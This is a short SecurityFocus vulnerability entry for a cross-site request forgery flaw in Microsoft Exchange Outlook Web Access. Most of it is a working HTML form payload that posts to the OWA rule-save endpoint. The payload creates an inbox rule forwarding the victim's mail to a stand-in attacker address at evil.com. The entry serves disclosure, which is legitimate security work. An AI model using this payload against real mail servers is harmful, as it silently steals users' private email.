Microsoft Exchange Server Outlook Web Access Cross Site Request Forgery Vulnerability

To exploit this issue, an attacker must entice an unsuspecting victim into visiting a malicious webpage.

The following example request is available:

<form name="myform" method="post" enctype="text/plain" action=https://www.example.com/owa/ev.owa?oeh=1&ns=Rule&ev=Save>
<input type="hidden" name='&#60params&#62&#60Id&#62&#60/Id&#62&#60Name&#62Test&#60/Name&#62&#60RecpA4&#62&#60item&#62&#60Rcp DN="attacker@evil.com" EM="attacker@evil.com" RT="SMTP" AO="3"&#62&#60/Rcp&#62&#60/item&#62&#60/RecpA4&#62&#60Actions&#62&#60item&#62&#60rca t="4"&#62&#60/rca&#62&#60/item&#62&#60/Actions&#62&#60/params&#62' value="">
</form>


 

Privacy Statement
Copyright 2010, SecurityFocus